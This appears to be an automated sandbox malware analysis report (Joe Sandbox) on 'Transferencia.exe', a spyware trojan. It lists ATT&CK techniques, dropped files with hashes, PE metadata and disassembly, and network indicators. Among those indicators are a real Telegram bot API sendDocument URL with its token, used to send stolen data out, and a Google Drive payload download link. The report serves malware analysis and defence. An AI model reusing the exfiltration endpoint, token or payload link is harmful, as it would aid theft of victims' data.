            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)111
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager331
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration21
            Encrypted Channel
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer3
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets251
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits114
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common251
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
            Process Injection
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Transferencia.exe27%ReversingLabsWin32.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsj4C7E.tmp\System.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsj4C7E.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://EawggF.com2%VirustotalBrowse
            http://EawggF.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external0%Avira URL Cloudsafe
            https://api.ipify.org%t-0%Avira URL Cloudsafe
            https://api.ipify.org%%startupfolder%0%Avira URL Cloudsafe
            http://nRQMtDNYU5cYJ.net0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            216.58.212.142
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                googlehosted.l.googleusercontent.com
                172.217.18.97
                truefalse
                  high
                  doc-04-1o-docs.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocumentfalse
                      high
                      https://doc-04-1o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106r562t78j67kq2fi8o6al2mrn8/1652268450000/12299294031038466182/*/1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv?e=downloadfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://EawggF.comCasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://doc-04-1o-docs.googleusercontent.com/CasPol.exe, 00000009.00000002.105232595181.000000000157C000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocumentdocument-----CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://api.telegram.orgCasPol.exe, 00000009.00000002.105256438921.000000001DC1B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105257088442.000000001DC88000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://drive.google.com/CasPol.exe, 00000009.00000002.105231609654.0000000001500000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.org/CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/externalCasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232397396.0000000001567000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.ipify.org%t-CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.ipify.org%%startupfolder%CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://nsis.sf.net/NSIS_ErrorErrorTransferencia.exefalse
                                      high
                                      https://doc-04-1o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106rCasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100614274320.0000000001593000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232397396.0000000001567000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://nRQMtDNYU5cYJ.netCasPol.exe, 00000009.00000002.105256389496.000000001DC15000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://api.telegram.orgCasPol.exe, 00000009.00000002.105256553167.000000001DC2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105257172459.000000001DCA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000009.00000002.105256438921.000000001DC1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            149.154.167.220
                                            api.telegram.orgUnited Kingdom
                                            62041TELEGRAMRUfalse
                                            216.58.212.142
                                            drive.google.comUnited States
                                            15169GOOGLEUSfalse
                                            172.217.18.97
                                            googlehosted.l.googleusercontent.comUnited States
                                            15169GOOGLEUSfalse
                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:624276
                                            Start date and time: 11/05/202213:25:292022-05-11 13:25:29 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 14m 6s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:Transferencia.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                            Run name:Suspected Instruction Hammering
                                            Number of analysed new started processes analysed:19
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@4/6@3/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 27.8% (good quality ratio 27.2%)
                                            • Quality average: 88.5%
                                            • Quality standard deviation: 21.2%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 51.124.57.242, 20.93.58.141
                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, spclient.wg.spotify.com, client.wns.windows.com, wdcpalt.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            TimeTypeDescription
                                            13:28:21API Interceptor2691x Sleep call for process: CasPol.exe modified
                                            No context
                                            No context
                                            No context
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\Transferencia.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):163440
                                            Entropy (8bit):7.327257313432124
                                            Encrypted:false
                                            SSDEEP:3072:TAJ8oRPFQ7IfdpA9PCAHmkvLl75I504TTRajaO7HlnKEmou:Mmcd2nGkvLI504TTIb7Fbmou
                                            MD5:12189C0F205D353F5492E0231A237B97
                                            SHA1:0ADAC1C37C0B1D812B77FA9466E501B068802061
                                            SHA-256:4C5C37CDD6B432A2E245CB3E4D5E31919BBA8A9A7246769A40E781EA4A407D71
                                            SHA-512:B67C7470BB1D1898A6233DF1D61034A76BC9A862A97C885CE9312A1FF318D0D1C7BBF228FB8E0846D3BAA5AC14751F562943356305569C9DF88F8449B70D7DC8
                                            Malicious:false
                                            Reputation:low
                                            Preview:.E.S..$.......B...^... ..u.H...&..t.....14.x].....}N..+.G.....Tp.$..{S...`).....b..Av.......X..n....^.IO`lw.(..........G..).=.<.B...8.t.&.iy.../R8...W..Ji........cF...(.E..{c......B*>y..6.......1f.r../.....\.@..2J...w.....0.8..D.;.<de..p.G.i....'...*.&.B..W<..I2.......!..w&.=I.P..x..e.kH......K.......[*..9..3....(...,..T.i.JP.W.%w.w=..r.w7X... 6.....Z...Q..bN..H..<..d..Q7...w..?.. Q......Y[g._....e...%m+6k.h.oT.\..aF.(..%....k..*L.....O..........B........ .....B..9."....w. ..s..a....U@....N..(}.}D....8 ..k..Rp..\.1..).4.]{..9..&.X._...t}...v.1...p%Ts.B-'...`_>......0.<1..Cqd....l'.....c.}8XB..8..,.m6Zm.v..X+..wG.pq...MY`.g....hX..........2..%.G.O....h....I...G....c......J_.pF|;f.v.....X.i......b....7d.%...24..s..h......v`...M7....o.`....&..,.E.0:.u...F....q.;..n..,..s.-.r*..........S.m...5.+.U.....~.h7.Z..sX..>"...zU.g1<.hA...../%......N.G.n?..FJ.v.....k...$.X.LCN..T.^O..)..=.l..e,.P.*+xuF...Q.D..qC6...jr..I..7...Et...VV ..d1...2_W..Y&.;.
                                            Process:C:\Users\user\Desktop\Transferencia.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):35
                                            Entropy (8bit):4.193429088311724
                                            Encrypted:false
                                            SSDEEP:3:Nn4y2XEIIz4Acv:t12ez4Acv
                                            MD5:459F02DD36C8D63BCDF3A4078AEBD592
                                            SHA1:C61BA4265FB1C24ED73775149BB1F9A62B688CC9
                                            SHA-256:428CF1D18B7B06811B313C57DF8D240EB44350F63336BD2822B3477525C8BC1A
                                            SHA-512:A90C2BF7B01C34C5E6E16BA0391258942EDE941424BEF83398F5FE6F8936D75AD68148787F51AE80E03F565D6533811726D8C958888DE02738F514383AA7F7F6
                                            Malicious:false
                                            Reputation:low
                                            Preview:[surucucu]..Lockram2=strandlberen..
                                            Process:C:\Users\user\Desktop\Transferencia.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):5.814115788739565
                                            Encrypted:false
                                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                            MD5:CFF85C549D536F651D4FB8387F1976F2
                                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Reputation:moderate, very likely benign file
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3036000
                                            Category:dropped
                                            Size (bytes):98304
                                            Entropy (8bit):2.9216957692876595
                                            Encrypted:false
                                            SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                                            MD5:1A706D20E96086886B5D00D9698E09DF
                                            SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                                            SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                                            SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000
                                            Category:modified
                                            Size (bytes):98304
                                            Entropy (8bit):0.08231524779339361
                                            Encrypted:false
                                            SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                            MD5:886A5F9308577FDF19279AA582D0024D
                                            SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                            SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                            SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):30
                                            Entropy (8bit):3.964735178725505
                                            Encrypted:false
                                            SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                            MD5:9F754B47B351EF0FC32527B541420595
                                            SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                            SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                            SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                            Malicious:false
                                            Preview:NordVPN directory not found!..
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.5547497516761295
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Transferencia.exe
                                            File size:254208
                                            MD5:fb1d131568bdd2fa951608534f83a75c
                                            SHA1:ff02df2cb07c221b8ed3583c6dafb8c0e35684f8
                                            SHA256:42625067621ac2dba6b95e565a48454637f46185356034da214a00a3d453c971
                                            SHA512:ef46d1fc90b046234a2939d1cbbadeb99cca056bfba74b3b1480af1a1171698a436cc23a809c8f0ec9f2ce5ca45d91db31151311415ed38a137070924476dc10
                                            SSDEEP:6144:s3yztNlmkDzzo+3sYIEJwqq1XPo6BktVrQGs20z:s3+FvzxsPXj1/o6Aiz
                                            TLSH:2344D01E3225C4E6F88883765F3A9B0B198FAC03219105177772BBB99B39383C95F5D5
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:....
                                            Icon Hash:8803969c49c2c3c0
                                            Entrypoint:0x40350a
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x614F9A68 [Sat Sep 25 21:53:44 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                            Signature Valid:false
                                            Signature Issuer:CN=&#34;Talonen Pral NONPERFECTIBILITY Unmigrant6 &#34;, O=ORDLYDEN, L=Bourg-Saint-Maurice, S=Auvergne-Rh&#195;&#180;ne-Alpes, C=FR
                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                            Error Number:-2146762487
                                            Not Before, Not After
                                            • 10/05/2022 11:58:17 10/05/2023 11:58:17
                                            Subject Chain
                                            • CN=&#34;Talonen Pral NONPERFECTIBILITY Unmigrant6 &#34;, O=ORDLYDEN, L=Bourg-Saint-Maurice, S=Auvergne-Rh&#195;&#180;ne-Alpes, C=FR
                                            Version:3
                                            Thumbprint MD5:C01462F3E1A1421FC7156C98C104EC74
                                            Thumbprint SHA-1:92A7393883A3AF47A744D137119C6E6BAEA9BC27
                                            Thumbprint SHA-256:41ACF6A35BC3571C0748976A332965863E86A47C8FBBED9FE240EE0D66E8DEA9
                                            Serial:F7E6FA3055C43850
                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 000003F4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [ebp-14h], ebx
                                            mov dword ptr [ebp-04h], 0040A2E0h
                                            mov dword ptr [ebp-10h], ebx
                                            call dword ptr [004080CCh]
                                            mov esi, dword ptr [004080D0h]
                                            lea eax, dword ptr [ebp-00000140h]
                                            push eax
                                            mov dword ptr [ebp-0000012Ch], ebx
                                            mov dword ptr [ebp-2Ch], ebx
                                            mov dword ptr [ebp-28h], ebx
                                            mov dword ptr [ebp-00000140h], 0000011Ch
                                            call esi
                                            test eax, eax
                                            jne 00007F83ECF5284Ah
                                            lea eax, dword ptr [ebp-00000140h]
                                            mov dword ptr [ebp-00000140h], 00000114h
                                            push eax
                                            call esi
                                            mov ax, word ptr [ebp-0000012Ch]
                                            mov ecx, dword ptr [ebp-00000112h]
                                            sub ax, 00000053h
                                            add ecx, FFFFFFD0h
                                            neg ax
                                            sbb eax, eax
                                            mov byte ptr [ebp-26h], 00000004h
                                            not eax
                                            and eax, ecx
                                            mov word ptr [ebp-2Ch], ax
                                            cmp dword ptr [ebp-0000013Ch], 0Ah
                                            jnc 00007F83ECF5281Ah
                                            and word ptr [ebp-00000132h], 0000h
                                            mov eax, dword ptr [ebp-00000134h]
                                            movzx ecx, byte ptr [ebp-00000138h]
                                            mov dword ptr [007A8B18h], eax
                                            xor eax, eax
                                            mov ah, byte ptr [ebp-0000013Ch]
                                            movzx eax, ax
                                            or eax, ecx
                                            xor ecx, ecx
                                            mov ch, byte ptr [ebp-2Ch]
                                            movzx ecx, cx
                                            shl eax, 10h
                                            or eax, ecx
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3da0000x139f0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x3da380x6c8.data
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x66700x6800False0.667931189904data6.43600264122IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rdata0x80000x139a0x1400False0.45data5.14577456407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xa0000x39eb780x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .ndata0x3a90000x310000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .rsrc0x3da0000x139f00x13a00False0.570872312898data6.54983643379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0x3da3580x8592PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                            RT_ICON0x3e28f00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 1056964863EnglishUnited States
                                            RT_ICON0x3e6b180x25a8dataEnglishUnited States
                                            RT_ICON0x3e90c00x1a68dataEnglishUnited States
                                            RT_ICON0x3eab280x10a8dataEnglishUnited States
                                            RT_ICON0x3ebbd00x988dataEnglishUnited States
                                            RT_ICON0x3ec5580x6b8dataEnglishUnited States
                                            RT_ICON0x3ecc100x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                            RT_DIALOG0x3ed0780x100dataEnglishUnited States
                                            RT_DIALOG0x3ed1780x11cdataEnglishUnited States
                                            RT_DIALOG0x3ed2980xc4dataEnglishUnited States
                                            RT_DIALOG0x3ed3600x60dataEnglishUnited States
                                            RT_GROUP_ICON0x3ed3c00x76dataEnglishUnited States
                                            RT_VERSION0x3ed4380x274dataEnglishUnited States
                                            RT_MANIFEST0x3ed6b00x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                            DLLImport
                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
